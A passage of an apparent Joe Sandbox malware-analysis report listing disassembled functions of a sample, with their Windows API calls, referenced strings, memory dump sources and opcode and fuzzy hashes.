                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: 7624e3b0b3cde17b2ded52e2722441a51ea598752b00c333ca4c4945f6e66121
                                                                                      • Instruction ID: b0f57e841164c79f90398cce5892df30772df8d2678d857dac04063210cef1e6
                                                                                      • Opcode Fuzzy Hash: 7624e3b0b3cde17b2ded52e2722441a51ea598752b00c333ca4c4945f6e66121
                                                                                      • Instruction Fuzzy Hash: 23512A61E2C2029ADB157724C9413BE3BA4FF40740F748F58E4F5822F9EB358D95AB86
                                                                                      Function 00C2E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 262654b6368c727d16d01a7cd7e481e1f8347bc97c78de17cb1902a28d28a834
                                                                                      • Instruction ID: 8846222410aae35b4540b71fdc69fa2126c7dfb7fc3158677d1957d1418718b7
                                                                                      • Opcode Fuzzy Hash: 262654b6368c727d16d01a7cd7e481e1f8347bc97c78de17cb1902a28d28a834
                                                                                      • Instruction Fuzzy Hash: F8513679500256DFDF25DF68D081AFA7BA8EF16310F244056FCA2AB2C0D7349E42DBA0
                                                                                      Function 00C2F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 00C2F2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2F2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      • Opcode ID: 0af7c62d41b143cc205cf75583c6ee69b2889d870091b6f00a75a0f32b47f19e
                                                                                      • Instruction ID: 7897c61a9405c8db4125bcdc3a31a3bbcef2f7e407e6328932ee64db824b38fb
                                                                                      • Opcode Fuzzy Hash: 0af7c62d41b143cc205cf75583c6ee69b2889d870091b6f00a75a0f32b47f19e
                                                                                      • Instruction Fuzzy Hash: C05134714087449BD320EF54D886BAFBBF8FB86300F81885DF199421A5EB308569DB66
                                                                                      Function 00C95745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C957E0
                                                                                      • _wcslen.LIBCMT ref: 00C957EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                      • String ID: CALLARGARRAY
                                                                                      • API String ID: 157775604-1150593374
                                                                                      • Opcode ID: 272f7f40e820f183d85736d8718429a996f41a7b55481f26b743e80531f9647a
                                                                                      • Instruction ID: 85b262f4c411a40b9df7c75021bae06a3cc006f581ae8ebbaf2fbd18043f36b7
                                                                                      • Opcode Fuzzy Hash: 272f7f40e820f183d85736d8718429a996f41a7b55481f26b743e80531f9647a
                                                                                      • Instruction Fuzzy Hash: A041AE71A002099FCF05DFA9C8899AEBBB5FF59724F108069E515A7291E7309E81DB90
                                                                                      Function 00C8D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00C8D130
                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C8D13A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CrackInternet_wcslen
                                                                                      • String ID: |
                                                                                      • API String ID: 596671847-2343686810
                                                                                      • Opcode ID: a4fd93a83ae857885b9e07b6a0f8bbbe9ff37520b5afaf71faf30b398b940604
                                                                                      • Instruction ID: cc9d0f41b01070fef11f665421d0db1f619f789e0e5a5455cf699e42f7ca69c3
                                                                                      • Opcode Fuzzy Hash: a4fd93a83ae857885b9e07b6a0f8bbbe9ff37520b5afaf71faf30b398b940604
                                                                                      • Instruction Fuzzy Hash: 8C314F71D00209ABCF15EFA5CC85EEE7FB9FF05314F000119F816A61A5DB31AA56EB54
                                                                                      Function 00CA356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00CA3621
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: cf6473e9c806394c33de45ceb471114cabd1c75cdf41550914d79854a1e92349
                                                                                      • Instruction ID: 344692d684696b354ca99e8d2345916292fa7aebcb6e4676ed2de574e6fee0af
                                                                                      • Opcode Fuzzy Hash: cf6473e9c806394c33de45ceb471114cabd1c75cdf41550914d79854a1e92349
                                                                                      • Instruction Fuzzy Hash: 1131BE71500245AEDB10DF68DC90FFB73A9FF8A728F008619F9A597280DA30EE81D760
                                                                                      Function 00CA4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CA461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA4634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '
                                                                                      • API String ID: 3850602802-1997036262
                                                                                      • Opcode ID: 318b71f12dbc4cccbb2d9cc78da374cbe211553a424a1f44c2f41c7ce726350d
                                                                                      • Instruction ID: bc25b3435b575065800350a5b58ac8323174d15a44dcb872861c47a19683ee29
                                                                                      • Opcode Fuzzy Hash: 318b71f12dbc4cccbb2d9cc78da374cbe211553a424a1f44c2f41c7ce726350d
                                                                                      • Instruction Fuzzy Hash: 94311974E0120A9FDB18CFA9C994BDA7BB5FF8A304F144069E915AB351D7B0A941CF90
                                                                                      Function 00CA31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CA327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA3287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: 1307537f2308dd3637b947402f3aeb53ebc3332cd3e2da6a08948cee6f747a2b
                                                                                      • Instruction ID: 2e366f6ccf4398975f655952c487388807bce03da00a97d830b207c20ad5e1c2
                                                                                      • Opcode Fuzzy Hash: 1307537f2308dd3637b947402f3aeb53ebc3332cd3e2da6a08948cee6f747a2b
                                                                                      • Instruction Fuzzy Hash: E811E6713002497FEF219E94DC90FBB376AEB56368F100225F92497291D6319E519760
                                                                                      Function 00CA3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
                                                                                        • Part of subcall function 00C1600E: GetStockObject.GDI32(00000011), ref: 00C16060
                                                                                        • Part of subcall function 00C1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00CA377A
                                                                                      • GetSysColor.USER32(00000012), ref: 00CA3794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: a06b247b284e6f1b0a765e272317c72fdf273977ec65c5276c2a3c4de05a96bf
                                                                                      • Instruction ID: 89cb4611c4132dc8e205507243055fd608077d135c0f721e817b64f939d9c45a
                                                                                      • Opcode Fuzzy Hash: a06b247b284e6f1b0a765e272317c72fdf273977ec65c5276c2a3c4de05a96bf
                                                                                      • Instruction Fuzzy Hash: 5F1129B261020AAFDB00DFA8CD45EFE7BB8EB0A358F004524F965E3250E735E9519B60
                                                                                      Function 00C8CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8CD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C8CDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: 24ee5c9e7e8e12e4eabee8c2d5d3c9d9b71913744aa53bb601a1919c71acd750
                                                                                      • Instruction ID: c1a63be00c400f3b9d336be049fc8de2b10ac5a555087777f12ba0bd2f772922
                                                                                      • Opcode Fuzzy Hash: 24ee5c9e7e8e12e4eabee8c2d5d3c9d9b71913744aa53bb601a1919c71acd750
                                                                                      • Instruction Fuzzy Hash: 9211A071205631BAD7286B668CC9FE7BEA8EB137A8F00423BF11983180D7709951D7F4
                                                                                      Function 00CA3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00CA34AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CA34BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: e47d04e3918b005ae051d507b7efdc1deaaa1cdf94d284e1920c7af8d709f1bd
                                                                                      • Instruction ID: c50fed5f147387fc2056b16069eb1b28842620f12ef905ecc9545e3858478337
                                                                                      • Opcode Fuzzy Hash: e47d04e3918b005ae051d507b7efdc1deaaa1cdf94d284e1920c7af8d709f1bd
                                                                                      • Instruction Fuzzy Hash: 97118F7150024AAFEB128E64DC94BEB3B6AEB0A37CF504724F971971D0C771DE91AB50
                                                                                      Function 00C76C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00C76CB6
                                                                                      • _wcslen.LIBCMT ref: 00C76CC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: STOP
                                                                                      • API String ID: 1256254125-2411985666
                                                                                      • Opcode ID: b415d007b996b0191449d1674f2aa38cd916cc3ecd145ea6ab3371676d2ffc5f
                                                                                      • Instruction ID: 218eacbff30c41cdd68c1bafdbe6a9775a27960571a3bf634008751d190db2bd
                                                                                      • Opcode Fuzzy Hash: b415d007b996b0191449d1674f2aa38cd916cc3ecd145ea6ab3371676d2ffc5f
                                                                                      • Instruction Fuzzy Hash: 8C0126326109268BCB21AFFDCC909FF33B8EF61710B104524E96697190EB31DA40D650
                                                                                      Function 00C71CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C71D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 23d7d0700c34be3c035d6c44c6ae9f9906dd883a8b78fe6333b8ace384f6ad15
                                                                                      • Instruction ID: 50d27e8d44c8b81814c1a55521eba9fe7c696c62a58d80b77bdc21ee898bf44d
                                                                                      • Opcode Fuzzy Hash: 23d7d0700c34be3c035d6c44c6ae9f9906dd883a8b78fe6333b8ace384f6ad15
                                                                                      • Instruction Fuzzy Hash: 4501FC71601214ABCB15EBA8CC61DFE7368FF57390F04461AFC76573C1EA305908AB60
                                                                                      Function 00C71BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C71C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 2bbf8688312d3184ed0405759722fc4cce7dc13d04f1bbd589542949b0e31d6a
                                                                                      • Instruction ID: 8aa64d59a9a8a1e1154335539a1629164c4bff6e34df86e22760766c544c922e
                                                                                      • Opcode Fuzzy Hash: 2bbf8688312d3184ed0405759722fc4cce7dc13d04f1bbd589542949b0e31d6a
                                                                                      • Instruction Fuzzy Hash: B701A77578110467DB05EBD4C962AFF77A8DB13380F24401ABD5A672C1EA209F18A6B1
                                                                                      Function 00C71C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C71CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: a6a256049c5ad0fa3cf9d5953078731d57ffafef3dd47fb20652f891759df739
                                                                                      • Instruction ID: a909011f9f9af8cd0132434bbef4ec07eea8e599ce1ceca54bfc0044e2308511
                                                                                      • Opcode Fuzzy Hash: a6a256049c5ad0fa3cf9d5953078731d57ffafef3dd47fb20652f891759df739
                                                                                      • Instruction Fuzzy Hash: 4401DB7174011467DB05EBD8CA12AFF77A89B13380F144016BD46732C1EA309F18E6B1
                                                                                      Function 00C71D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C73CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C71DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: f215da5dcebb08206aefcc5b699c494d0d89c48cc00bb6e93ed10a8b7d4c2ae9
                                                                                      • Instruction ID: b7c0f8a23366056dae8d92393f520ad7501a82104d223cddd2d75025b28c17d7
                                                                                      • Opcode Fuzzy Hash: f215da5dcebb08206aefcc5b699c494d0d89c48cc00bb6e93ed10a8b7d4c2ae9
                                                                                      • Instruction Fuzzy Hash: DEF0A471B5121467DB15E7A8CC62BFF77A8EB13390F080916BD66632C1DA705A08A6A0
                                                                                      Function 00C9747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
